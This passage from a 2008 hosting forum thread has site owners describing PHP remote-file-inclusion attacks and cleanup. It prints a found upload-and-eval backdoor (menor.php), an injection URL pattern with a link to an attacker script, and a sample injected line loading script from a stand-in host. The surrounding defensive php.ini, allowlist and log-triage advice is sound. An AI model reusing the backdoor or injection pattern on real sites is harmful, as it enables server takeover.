#16
    Contributing User, joined Sep 2002, 222 posts
    Originally Posted by jedimasta
    I'm running GoDaddy and coincidently was considering BlueHost as an alternative.
    I've been with BlueHost for years and they have been great up until this point. Sometimes the support from BlueHost is lacking, but on this issue I had good support from someone who cared and seemed interested in resolving it.

    I don't really think that my admin password was the problem because if it was and they had access to all my sites, the choice of the site they attacked seems illogical. I have more popular sites on that account.

    Also, the site that got attacked has no hackable scripts (to my knowledge) because there ARE NO scripts to hack.

    I think WordPress code was exploited.

    I dunno...

    I was considering ixwebhosting.com as an alternative.
    _____________________________________________
    Sites & Interests:
    Sexy Wallpapers
    SEO Chat
#17
    Registered User, joined Mar 2008, 10 posts
    I have had this same exact problem for the last 6 or 7 months. However, the hacker actually decided to go ahead and delete all of my files and change my password a few weeks ago. The way they are getting in is by exploiting a flaw in global variables and passing URLs through my site that give them full access to do whatever they want. I copied one of the programs that has been run on our site in the past, though this is probably a different program than what is being run to do the .htaccess hack, but it's the same method and yields the same results.

    copy of program: "free.radio.su/bobatka.info.txt" << THIS FILE MAY CONTAIN VIRUSES BUT REMAINS FOR THREAD RELEVANCE >>

    If you run this program, keep in mind it will create a file errors.php that can be used for further exploits. For my site the hacker is running the program by exploiting the variable incFile, for instance:

    /index.php?Tab=Category&incFile= INSERT PROGRAM HERE

    Like I said, this is different than the .htaccess program, but it works the same and uses the same exploit to take over your site, if you have a variable that could be exploited. So basically the hacker is taking advantage of this global variables PHP exploit and inserting the URL of the code they run remotely into the URL so that they can run the program on your server. How to fix the problem? Make it so the hacker can't pass URLs on your site. My problem isn't knowing how they are getting in, it's being able to fix it, and with my very limited PHP knowledge that is not something I can do.
    Last edited by jharnois; March 17th, 2008 at 04:46 PM. Reason: Added notice to users about linked file.
#18
    Registered User, joined Jul 2004, 10 posts
    Originally Posted by scataloth
    I have had this same exact problem for the last 6 or 7 months. ...
    The solution I'm adopting is in sanitizing the variables. Yeah, you could disable globals, but that is virtual death to dynamically driven sites like mine. Though I've yet to actually test it, I'm still using GET variables in the URL, but they are checked for valid content before being passed to the page. For example:

    Code:
    /?page=displayArticle&articleNum=45
    a savvy enough user could figure out that displayArticle is a php file and could use the exploit to run external scripts:

    Code:
    ?page=http://www.yahoo.com...
    What I'm in the process of doing is validating the variable against an array of options and doing as much as I can to eliminate GET variables that would be used directly in SQL or page includes:

    Code:
    $valid = array('displayArticle','displayPoll','displayDiscussion');
    if (in_array($_GET['page'], $valid)) {
        include($_GET['page'] . '.php');
    } else {
        include('error.php'); // display error
    }
    It's a good start anyway. Of course this isn't my ACTUAL code, cuz I'm not that green.
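A fuller version of the allowlist dispatcher described in the post above, added here as an example and not the poster's own code (the page keys and file names in $pages are assumed): the request value is only ever used as a key into a fixed map, never as a path, so a remote URL, a traversal string or an array parameter all fall through to error.php regardless of how php.ini is configured.

```php
<?php
// Added example, not code from the thread. Dispatcher for URLs such as
// /?page=displayArticle&articleNum=45 (post #18). The request value is
// only ever a key into $pages, never a path, so ?page=http://...,
// ?page=../something and ?page[]=x all land on error.php, whatever
// allow_url_fopen is set to.

// Assumed page keys and the files they map to.
$pages = array(
    'displayArticle'    => 'displayArticle.php',
    'displayPoll'       => 'displayPoll.php',
    'displayDiscussion' => 'displayDiscussion.php',
);

function resolvePage(array $pages, $requested, $default = 'error.php')
{
    // $_GET['page'] is an array for ?page[]=x; accept strings only.
    if (!is_string($requested)) {
        return $default;
    }
    // Exact key match: no loose comparison, no prefix or substring tricks.
    if (!array_key_exists($requested, $pages)) {
        return $default;
    }
    return $pages[$requested];
}

// Numeric parameters are validated and cast before they reach SQL or a path.
function resolveArticleNum($raw)
{
    return (is_string($raw) && ctype_digit($raw)) ? (int) $raw : 0;
}

$page = resolvePage($pages, isset($_GET['page']) ? $_GET['page'] : null);
$articleNum = resolveArticleNum(isset($_GET['articleNum']) ? $_GET['articleNum'] : '');

// Include from a fixed directory; the raw query value never reaches include().
include dirname(__FILE__) . '/' . $page;
```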
#19
    Registered User, joined Mar 2008, 10 posts
    Ok, I did some Google searching today and came across this fix. In your php.ini file (if you don't have one, make a plain text file with that name) insert the code:

    allow_url_fopen = Off

    This prevents people from passing remote URLs through your site. So far it looks like this works since I can no longer do just that. However, these hackers are pretty sophisticated so I wouldn't be surprised if they know of a way around this or have another exploit that they could be using, but at least I know that one of the hacks that I have experienced in the past will no longer work with this turned OFF. The hackers have been attacking almost every day for the past few weeks, so if they don't attack tonight or tomorrow I'll feel pretty confident it is a good fix.
#20
    Registered User, joined Jul 2004, 10 posts
    Originally Posted by scataloth
    ...
    allow_url_fopen = Off
    ...
    Keep me posted, if you wouldn't mind. This is the fix offered up by GoDaddy, but initially I don't believe it did anything. The logs showed the attacker attempting the injection hack again, but the fact is that my site's files were removed to prevent further attempts entirely.
#21
    Registered User, joined Mar 2008, 10 posts
    Sure, I will let you know what happens.
#22
    Registered User, joined Mar 2008, 10 posts
    So far so good.
#23
    Registered User, joined Mar 2008, 10 posts
    Just a quick update. Looks like creating a php.ini file and adding the line:

    allow_url_fopen = Off

    ... fixed the problem completely. I also decided to go ahead and add the following settings to php.ini to prevent the hackers from getting any additional information:

    allow_url_fopen = Off
    register_globals = Off
    display_errors = Off
    expose_php = Off
    log_errors = On

    Also make sure that you add this to your .htaccess file so people can't see your php.ini settings:

    <Files php.ini>
    order allow,deny
    deny from all
    </Files>

    Also make sure to remove the code that is inserted into all of your .css and .js files on the server! In addition there should be a few .php files that the hackers probably put on your server as well which will allow them to regain entry into your site if you don't remove them. Just look at your access logs for any POST commands and see where the files are located. So #1 make sure to create a php.ini file with the settings above and #2 clean up all your files and remove any malicious code from your .js and .css files as well as any additional .php files that shouldn't be there. That's it! Problem solved. So far no hacking for over a week since I did this.
#24
    Registered User, joined Jul 2004, 10 posts
    Originally Posted by scataloth
    ... fixed the problem completely...
    Indeed. These steps are basically the same that I put into place after tearing my hair out over the past few weeks. My site is now back up and though I've seen a few hits of people attempting the injection hack, all have failed. My code remains clean and my traffic is slowly ramping back up after being 404 for several days.

    Thanks everyone for the back and forth. It helps knowing I'm not the only one out there.
#25
    Contributing User, joined Sep 2002, 222 posts
    UPDATE:

    Well, apparently changing the password to my BlueHost account didn't really help that much.

    A week ago I deleted the entire Wordpress folder that contained the offensive code. In fact, I deleted ALL the code from that site entirely. (It's just a testing domain anyway).

    Today I logged in to my server to test another piece of code on that domain, and I saw that /wp-includes/js/tinymce/themes/advanced/uhe/ex3/t.htm had reinstalled itself.

    YARGH!!

    But my sites haven't been hacked again, so it hasn't had any negative effect that I know of.

    Let me know if you figure out a way to get over this hack!!
#26
    Contributing User, joined Sep 2002, 222 posts
    Originally Posted by jedimasta
    I'm running GoDaddy and coincidently was considering BlueHost as an alternative.

    That sounds like the same excuse I got from my techs...
    Well, apparently it didn't work. After deleting the entire site that contained the WordPress directories that were hacked, I logged in to that account and found that all those subdirectories had magically reinstalled themselves (juiceboxlabs/wp-includes/js/tinymce/themes/advanced/uhe/ex3/t.htm).

    At least none of my live sites have been affected by the reappearance of this code. Nothing seems to be broken.

    I don't really like this and I don't really know what to do. I don't really want to switch hosts...
#27
    Registered User, joined Mar 2008, 10 posts
    Originally Posted by Hugh G. Rection
    Well, apparently it didn't work. After deleting the entire site that contained the WordPress directories that were hacked, I logged in to that account and found that all those subdirectories had magically reinstalled themselves (juiceboxlabs/wp-includes/js/tinymce/themes/advanced/uhe/ex3/t.htm).

    At least none of my live sites have been affected by the reappearance of this code. Nothing seems to be broken.

    I don't really like this and I don't really know what to do. I don't really want to switch hosts...
    Removing the files isn't enough, did you take the steps mentioned above about adding this to your php.ini file?

    allow_url_fopen = Off
    register_globals = Off

    After you do that you'll need to check and see if any of your .css and .js files are infected AND make sure to remove the 3 or 4 other backdoor .php files that will likely be on your server. Keep in mind your backup copy of your site could be infected if it's a backup of the infected site! (I know that sounds like common sense.) Doing those few things 100% fixed the problem so far for me. I was getting hacked almost daily for the past 6 months and once I did this, I haven't been hacked one time since doing this.
#28
    Contributing User, joined Sep 2002, 222 posts
    Originally Posted by scataloth
    Removing the files isn't enough, did you take the steps mentioned above about adding this to your php.ini file?

    allow_url_fopen = Off
    register_globals = Off

    After you do that you'll need to check and see if any of your .css and .js files are infected AND make sure to remove the 3 or 4 other backdoor .php files that will likely be on your server. Keep in mind your backup copy of your site could be infected if it's a backup of the infected site! (I know that sounds like common sense.) Doing those few things 100% fixed the problem so far for me. I was getting hacked almost daily for the past 6 months and once I did this, I haven't been hacked one time since doing this.
    I'll try this soon. Thanks.
#29
    Contributing User, joined Sep 2002, 222 posts
    I found this random php file somewhere in my folder structure. It was called menor.php

    Here is the code it had:

    PHP Code:
    <?php
    error_reporting(1);
    global $HTTP_SERVER_VARS;
    function say($t) { echo "$t\n"; };
    function testdata($t) { say(md5("testdata_$t")); };
    echo "<pre>"testdata('start');
    // Gate: only a POSTed "p" whose md5 matches the hard-coded hash gets further.
    if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
        // Reads an uploaded file "f" and runs its contents as PHP: an upload-and-eval backdoor.
        if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
            eval($code);
        }else{
            testdata('f');
        };
    }else{
        testdata('pass');
    };
    testdata('end');
    echo "</pre>"?>
    I've edited my php.ini file and I hope it works.

    My server (Bluehost) also has a file called php.in (not .ini) ... is that the same thing? Do I need to edit both?
    Last edited by Hugh G. Rection; March 14th, 2008 at 01:21 AM.
#30
    Registered User, joined Mar 2008, 10 posts
    Originally Posted by Hugh G. Rection
    I found this random php file somewhere in my folder structure. It was called menor.php
    ...
    I've edited my php.ini file and I hope it works.

    My server (Bluehost) also has a file called php.in (not .ini) ... is that the same thing? Do I need to edit both?
    Not sure if you need to edit both or not, but make sure you get rid of all the files that don't belong. When I had this happen to me, there were 3 .php files on my server that did not belong in addition to the fake blog folder that was created. That's not to say that you will have more or less, but I'd strongly recommend taking a good look at all of your files and see if you missed any. Also clean up all of your .css and .js files. Almost every single .css and .js file on my server had a chunk of code all the way at the bottom; you'll know it when you see it. Delete that chunk of code from every .css and .js file. Create a php.ini file as suggested earlier with the settings listed. Change your FTP and cPanel passwords as well to play it safe. Check your error_log and access_log to see if there are any POST commands to your server not requested by you. If there are, see what file they are referring to; this is how I found the 3 .php files that didn't belong. They were backdoor files that allowed remote access to the server even after patching up the exploit with the php.ini settings. After you do all that it should be hack-free and you should not receive any more attacks using this particular exploit.
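A small triage script for the cleanup steps in this post and post #23, added here as an example and not code from the thread: it counts POST requests per target path from access_log lines (so a backdoor .php file stands out) and flags .css/.js files whose last lines contain script-like code. The Apache combined log format and the marker list are assumptions; the log lines and the CSS sample are constructed.

```php
<?php
// Added example, not code from the thread. Two triage helpers for the
// cleanup steps in the posts above: which paths receive POST requests
// (to spot backdoor .php files), and which .css/.js files end in
// script-like code. Assumes the Apache "combined" log format; the
// markers in $suspicious are an assumed heuristic, not a known signature.

// Count POST requests per target path, most frequent first.
function postTargets(array $logLines)
{
    $counts = array();
    foreach ($logLines as $line) {
        if (preg_match('/"POST\s+(\S+)\s+HTTP\/[\d.]+"/', $line, $m)) {
            $path = strtok($m[1], '?');   // drop any query string
            $counts[$path] = isset($counts[$path]) ? $counts[$path] + 1 : 1;
        }
    }
    arsort($counts);
    return $counts;
}

// True if the last lines of a .css/.js file look like appended script code.
function tailLooksInjected($content, $tailLines = 5)
{
    $suspicious = array('<script', 'eval(', 'unescape(', 'fromCharCode(', 'document.write(');
    $lines = preg_split('/\r?\n/', rtrim($content));
    $tail = implode("\n", array_slice($lines, -$tailLines));
    foreach ($suspicious as $marker) {
        if (stripos($tail, $marker) !== false) {
            return true;
        }
    }
    return false;
}

// Constructed sample input (not real log data from the thread).
$sampleLog = array(
    '10.0.0.5 - - [14/Mar/2008:01:21:00 +0000] "GET /index.php?Tab=Category HTTP/1.1" 200 512 "-" "Mozilla"',
    '10.0.0.9 - - [14/Mar/2008:01:22:10 +0000] "POST /wp-includes/js/menor.php HTTP/1.1" 200 88 "-" "Mozilla"',
    '10.0.0.9 - - [14/Mar/2008:01:25:44 +0000] "POST /wp-includes/js/menor.php HTTP/1.1" 200 88 "-" "Mozilla"',
    '10.0.0.2 - - [14/Mar/2008:02:00:01 +0000] "POST /contact.php HTTP/1.1" 200 1024 "-" "Mozilla"',
);
print_r(postTargets($sampleLog));

// Constructed .css sample with a script chunk appended at the bottom.
$sampleCss = "body { margin: 0; }\n.hidden { display: none; }\ndocument.write(unescape('%3Cscript src=%22http://example.invalid/x.js%22%3E'));\n";
var_dump(tailLooksInjected($sampleCss));
```

Legitimate minified .js often contains eval( or document.write(, so treat hits as a list of files to open by hand rather than a verdict; a POST target you did not put on the server is the stronger signal.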
